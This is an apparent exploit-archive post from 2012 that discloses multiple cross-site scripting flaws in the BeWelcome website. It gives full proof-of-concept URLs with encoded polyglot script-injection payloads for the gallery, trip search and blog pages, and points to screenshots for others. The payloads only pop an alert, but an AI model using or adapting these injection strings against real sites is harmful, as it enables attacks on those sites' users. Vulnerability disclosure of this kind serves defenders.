Home / exploits BeWelcome Cross Site Scripting
Posted on 11 February 2012
# Exploit Title: BeWelcome Cross Site Scripting # Date: 10.02.2012 # Author: Sony # Software Link: http://www.bewelcome.org # Web Browser : Mozilla Firefox # Blog : http://st2tea.blogspot.com # PoC: http://st2tea.blogspot.com/2012/02/bw-rox-cross-site-scripting.html .................................................................. About BeWelcome: http://redmine.bewelcome.org/projects/bw-drupal http://trac.bewelcome.org/ http://bw.guaka.org/ Well, we have a Multiple Cross Site Scripting Vulnerabilities. Demo: in the gallery: http://www.bewelcome.org/gallery/show/user/sony/images/%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E http://2.bp.blogspot.com/-N1L_Rk0Agzw/TzTLoQzGqLI/AAAAAAAAAdk/hPBJnsAG_uc/s1600/galery.JPG In the group: http://4.bp.blogspot.com/-WIiIow6KlxE/TzTL2eFwB4I/AAAAAAAAAdw/rjPX_PQsAjU/s1600/group.JPG http://2.bp.blogspot.com/-Zk_7swxEeWY/TzTL8tiRtzI/AAAAAAAAAd8/im2s7JqUMtY/s1600/group2.JPG in the search "trips": http://www.bewelcome.org/trip/search?s=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&submit=Search+trips http://1.bp.blogspot.com/-upC9swXCjic/TzTMUNjSzzI/AAAAAAAAAeI/0zTzuUq53Xo/s1600/search.JPG in the blogs: http://www.bewelcome.org/blog/cat%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E http://4.bp.blogspot.com/-tj3SZCU9Lpo/TzTMvjffzXI/AAAAAAAAAeU/TpmcYAGBi1A/s1600/blog.JPG in the "send invite": http://4.bp.blogspot.com/--o2H_bAa9pU/TzTM4X8gVdI/AAAAAAAAAeg/XieM3FxVWEA/s1600/invite.JPG I think in the profile too. Etc.. .................................................................. InSecurity.Ro Because we care, we're security aware!
